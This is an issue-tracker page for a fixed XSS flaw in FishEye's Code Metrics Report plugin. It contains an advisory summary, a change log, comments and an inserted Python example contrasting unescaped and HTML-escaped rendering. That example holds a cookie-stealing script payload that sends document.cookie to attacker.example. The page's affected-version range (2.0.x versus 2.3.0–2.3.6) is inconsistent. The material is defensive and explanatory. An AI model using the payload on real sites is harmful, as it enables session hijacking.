FishEye / FE-3129

XSS vulnerability in FishEye's Code Metrics Report plugin

    • Type: Bug
    • Resolution: Fixed
    • Priority: Highest
    • Fix Version/s: 2.3.7, 2.4.0
    • Affects Version/s: 2.3.0, 2.3.1, 2.3.2, 2.3.3, 2.3.4, 2.3.5, 2.3.6
    • Component/s: None
    • Labels: None

      We have identified and fixed a cross-site scripting (XSS) vulnerability in FishEye's Code Metrics Report plugin. This affects FishEye 2.0.x to 2.3.6 inclusive; the fix ships in FishEye 2.3.7 and 2.4.0.

      • An attacker could exploit the vulnerability to steal the session of a logged-in user, for example by injecting script that reads the session cookie and sends it to a server the attacker controls. Marking the session cookie HttpOnly limits cookie theft but does not stop an injected script from performing other actions as that user.
      • XSS vulnerabilities allow an attacker to embed their own JavaScript into a FishEye page. The attacker's text and script are then rendered for, and executed in the browsers of, other users viewing the page.

      This issue is reported in our security advisory on this page:
      https://confluence.atlassian.com/display/FISHEYE/FishEye+Security+Advisory+2010-10-20

      You can read more about XSS attacks at cgisecurity, CERT and other places on the web:
      • http://www.cgisecurity.com/xss-faq.html
      • http://www.cert.org/advisories/CA-2000-02.html
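      The issue does not say which Code Metrics Report input is reflected, so the following is a generic illustration added here, not FishEye code or the vendor's fix: a toy report renderer that concatenates an untrusted label into HTML, the same row rendered with encoding appropriate to each output context, and a check showing that the encoded output no longer carries the script. The function names, the cookie-stealing payload and the sample values are constructed for this example.

```python
import html
from urllib.parse import quote

# Constructed sample input: a report parameter an attacker controls (a file or
# module label, say) that the page reflects. The payload is a textbook
# session-theft probe, not something taken from the FishEye ticket.
PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'


def render_metric_row_vulnerable(label: str, loc: int) -> str:
    """Builds a table row by string interpolation: the label lands in HTML unencoded."""
    return f"<tr><td>{label}</td><td>{loc}</td></tr>"


def render_metric_row_safe(label: str, loc: int) -> str:
    """Same row, but the untrusted label is HTML-encoded and the count is forced to int."""
    return f"<tr><td>{html.escape(label, quote=True)}</td><td>{int(loc)}</td></tr>"


def render_link_safe(label: str, path: str) -> str:
    """A value inside a URL query needs percent-encoding; the same value shown as
    element text needs HTML encoding. Using one where the other is required is a
    common way to reintroduce XSS after a 'fix'."""
    return f'<a href="/report?path={quote(path, safe="")}">{html.escape(label)}</a>'


def contains_active_content(fragment: str) -> bool:
    """Crude marker check, used only to make the difference visible in this demo.
    It is not a sanitizer and must not be used as one."""
    lowered = fragment.lower()
    return "<script" in lowered or "onerror=" in lowered or "javascript:" in lowered


def demo() -> dict:
    """Renders the constructed payload both ways and reports whether raw script survives."""
    vulnerable = render_metric_row_vulnerable(PAYLOAD, 120)
    safe = render_metric_row_safe(PAYLOAD, 120)
    return {
        "vulnerable_reflects_script": contains_active_content(vulnerable),
        "safe_reflects_script": contains_active_content(safe),
        "safe_row": safe,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")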


            Owen made changes -
            Workflow Original: FE-CRUC Bug Workflow [ 2942384 ] New: JAC Bug Workflow v3 [ 2956770 ]
            Owen made changes -
            Workflow Original: FECRU Development Workflow - Triage - Restricted [ 1516003 ] New: FE-CRUC Bug Workflow [ 2942384 ]
            Owen made changes -
            Workflow Original: FECRU Development Workflow - Triage [ 944421 ] New: FECRU Development Workflow - Triage - Restricted [ 1516003 ]

            Brian Martin added a comment - Thanks for the quick reply and confirmation!

            Andrew added a comment - brian1865464237 I've updated the link.
            Andrew made changes -
            Description: advisory link updated, text otherwise unchanged
              Original: http://confluence.atlassian.com/x/uwJrDQ
              New: https://confluence.atlassian.com/display/FISHEYE/FishEye+Security+Advisory+2010-10-20

            Brian Martin added a comment - http://confluence.atlassian.com/x/uwJrDQ has been dead for some time. Is there an updated advisory link?
            Piotr Swiecicki made changes -
            Workflow Original: FECRU Development Workflow (Triage) [ 310441 ] New: FECRU Development Workflow - Triage [ 944421 ]
            Seb Ruiz (Inactive) made changes -
            Workflow Original: Simple review flow with triage [ 235555 ] New: FECRU Development Workflow (Triage) [ 310441 ]
            mwatson made changes -
            Component/s Original: FE [ 13190 ]
            Fix Version/s New: 2.3.7 [ 15544 ]
            Fix Version/s New: 2.4.0 [ 15350 ]
            Fix Version/s Original: 2.4.0 [ 15231 ]
            Fix Version/s Original: 2.3.7 [ 15500 ]
            Key Original: CRUC-4572 New: FE-3129
            Project Original: Crucible [ 11771 ] New: FishEye [ 11830 ]
            Affects Version/s New: 2.3.0 [ 15272 ]
            Affects Version/s New: 2.3.1 [ 15274 ]
            Affects Version/s New: 2.3.2 [ 15260 ]
            Affects Version/s New: 2.3.3 [ 15284 ]
            Affects Version/s New: 2.3.4 [ 15330 ]
            Affects Version/s New: 2.3.5 [ 15391 ]
            Affects Version/s New: 2.3.6 [ 15420 ]
            Affects Version/s Original: 2.3.0 [ 15232 ]
            Affects Version/s Original: 2.3.2 [ 15243 ]
            Affects Version/s Original: 2.3.1 [ 15273 ]
            Affects Version/s Original: 2.3.3 [ 15285 ]
            Affects Version/s Original: 2.3.4 [ 15331 ]
            Affects Version/s Original: 2.3.5 [ 15392 ]
            Affects Version/s Original: 2.3.6 [ 15421 ]
            Reporter Original: Andrew [ alui ]

              Assignee: Andrew (alui)
              Reporter: Anonymous
              Watchers: 2